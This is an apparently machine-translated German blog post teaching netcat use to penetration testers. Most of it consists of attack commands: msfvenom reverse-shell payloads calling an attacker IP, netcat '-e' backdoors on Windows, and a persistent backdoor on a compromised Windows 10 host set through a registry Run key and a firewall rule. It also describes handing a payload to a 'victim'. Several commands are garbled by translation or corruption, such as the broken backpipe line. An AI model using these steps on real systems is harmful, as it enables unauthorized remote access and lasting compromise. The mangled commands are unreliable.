NetCat für Pentester / Sudo Null IT-News

Einführung in NetCat

Netcat, auch als “nc” verwendet, ist ein Netzwerkdienstprogramm, das TCP- und UDP-Verbindungen zum Lesen und Schreiben im Netzwerk verwendet. Es kann sowohl von Angreifern als auch von Sicherheitsprüfern verwendet werden. In Anbetracht des Angriffsszenarios kann dieses funktionsübergreifende Tool skriptgesteuert sein, was es ziemlich zuverlässig macht und uns auch beim Debuggen und Erkunden des Netzwerks hilft.

Netcat kann alles, sei es Port-Scanning, Banner-Erfassung, Dateiübertragung oder sogar das Herstellen einer umgekehrten Verbindung.

Werfen wir einen Blick auf die Hauptfunktionen von netcat:

  1. Es fungiert als einfacher TCP/UDP/SCTP/SSL-Client zur Kommunikation mit Webservern, Telnet-Servern, Mailservern und anderen TCP/IP-Netzwerkdiensten.

  2. Es leitet den TCP/UDP/SCTP-Datenverkehr an andere Ports oder Hosts um und fungiert als SOCKS- oder HTTP-Proxy.

  3. Netcat kann sich sogar über eine Kette von anonymen oder authentifizierten Proxys mit Zielen verbinden

  4. Verschlüsselt die Kommunikation mit SSL und überträgt sie über IPv4 oder IPv6.

  5. Es fungiert als Verbindungsbroker, der es zwei (oder mehr) Clients ermöglicht, sich über einen dritten (Proxy-)Server zu verbinden. Bis jetzt haben Sie vielleicht alle Funktionen von Netcat gekannt, die es einzigartig und einfach machen. Lassen Sie uns versuchen, tiefer zu graben und herauszufinden, was wir mit diesem erstaunlichen Tool sonst noch tun können.

Linux-Reverse-Shell

Wie bereits erwähnt, kann netcat alles tun, also werden wir jetzt versuchen, den Zielcomputer mit msfvenom zu verwenden, um eine Nutzlast zu erstellen und einen netcat-Listener einzurichten, um die Sitzung zu erfassen.

Versuchen wir, eine Payload mit dem folgenden Befehl zu erstellen:

msfvenom -p cmd/unix/reverse_netcat lhost=192.168.123.123 lport=1234 R

Der “R”-Parameter wird verwendet, um die rohe Nutzlast zu generieren, die auf unserem Bildschirm angezeigt wird.

Im Bild oben sehen Sie, dass unsere Payload bereit ist, jetzt ist es an der Zeit, sie auf dem Server unseres Opfers auszuführen.

Öffnen Sie eine Ubuntu-Maschine und geben Sie diese Payload in ein Terminal ein. Bevor Sie es ausführen, kehren Sie zum Kali-Linux-Computer zurück und richten Sie einen Netcat-Listener mit derselben Portnummer ein, die Sie beim Erstellen der Nutzlast verwendet haben.

Aber in einem Hochsicherheitsfall können wir die Sitzung mit dieser Methode nicht erfassen, aber es gibt eine andere Möglichkeit, eine Reverse-Shell zu erhalten. Konfigurieren Sie zuvor den Netcat-Listener auf Port 443.

Führen Sie nach dem Start von nc einfach die folgenden Befehle auf dem Zielcomputer aus:

mknod /tmp/backpipe p
/bin/sh0/tmp/backpipe

Dies hilft Ihnen, die Sicherheit zu umgehen und sich mit der Netcat-Sitzung zu verbinden.

Ergreifen des HTTP-Banners

HTTP-Header können nicht mehr ohne weiteres abgerufen werden, da sie Informationen über den Server enthalten. Aber wir können netcat verwenden, um Informationen über jeden Webserver zu sammeln.

Führen Sie einfach den folgenden Befehl aus, um den Zielserver zu manipulieren und zu überprüfen, was wir erfasst haben.

printf “GET / HTTP/1.0\r\n\r\n” | NC 192.168.123.123 80

Im Bild sehen Sie, dass das HTTP-Banner empfangen wurde und uns der nginx-Server präsentiert wird.

Windows-Reverse-Verbindung

Lassen Sie uns nun eine Hintertür auf einem Windows-Rechner generieren, mit der wir uns jederzeit anmelden können. Lassen Sie uns zuerst einen Listener auf unserer Kali-Maschine einrichten:
nc-lvp 1234
Führen Sie dann an der Windows-Eingabeaufforderung des Opfers den folgenden Befehl aus, um die Hintertür zu erstellen.
nc.exe 192.168.123.123 1234 -e Backd.exe
Nach dem Ausführen von Backd.exe erhalten wir eine Reverse-Shell, und wir erhalten auch dann eine Rückverbindung, wenn die Verbindung zwischen den Computern unterbrochen ist, vorausgesetzt, dass die IP-Adresse des angegriffenen Computers dieselbe bleibt und Backd.exe unverändert bleibt gestartet.

Windows 10-Persistenz

Versuchen wir also, mit netcat und dem Metasploit-Framework auf dem von uns kompromittierten Host eine permanente Hintertür zu erstellen. In der Abbildung unten sehen Sie, dass ich die Meterpreter-Sitzung auf dem Computer mit Windows 10 erfasst habe. Laden Sie nun die Datei netcat.exe mit dem folgenden Befehl in system32 auf dem Opfercomputer herunter:
Laden Sie /usr/share/windows-binaries/nc.exe C:\windows\system32 hoch

Konfigurieren Sie nun netcat so, dass es auf einem beliebigen Port lauscht, sagen wir 4445, öffnen Sie den Port beim Start und stellen Sie eine Verbindung her. Verwenden Sie den folgenden Befehl:
reg setval -k HKLM\software\microsoft\windows\currentversion\run -v netcat -d ‘C:\windows\system32\nc.exe -Ldp 4445 -e cmd.exe’

Bei erfolgreicher Verbindung mit netcat erhalten wir die umgekehrte Shell der Maschine des Opfers.
Jetzt ist es an der Zeit, der Firewall eine neue Regel mit dem Namen “netcat” hinzuzufügen, bei der die eingehende Verbindung Port 4445 mit einem interaktiven cmd zulässt, das den netsh-Befehl ausführt.

Geben Sie den folgenden Befehl ein:
netsh advfirewall firewall add rule name=”netcat” dir=in action=allow protocol=Tcp localport=4445
Überprüfen Sie nun den Betriebsmodus und den Portstatus mit dem folgenden Befehl:
Netsh-Firewall zeigt portopening an

Wenn das Opfer nun das System neu startet, erhalten wir die Netcat-Shell. Führen Sie den folgenden Befehl aus, um unsere Netcat-Hintertür auf Port 4445 zu verbinden:
nc-nv 192.168.1.105 4445
Wir haben erfolgreich eine permanente Hintertür eingerichtet, jetzt, wenn das Opfer bootet, haben wir immer seine Sitzung.

Msfvenom Payload mit Netcat

Lassen Sie uns also herausfinden, wie wir mithilfe der msfvenom-Payload über unsere Netcat-Shell eine Verbindung zum Opfer herstellen können. Starten Sie ein Terminal und führen Sie den folgenden Befehl aus, um die .exe-Payload zu generieren.
msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.109 lport=3333 –f exe > shell.exe

Aktivieren Sie nun Netcat auf Port 3333:
nc -lvp 3333
Teilen Sie diese generierte Nutzlast mit dem Opfer und sobald er sie öffnet, erhalten Sie eine umgekehrte Verbindung.

Similar Posts

Leave a Reply

Your email address will not be published.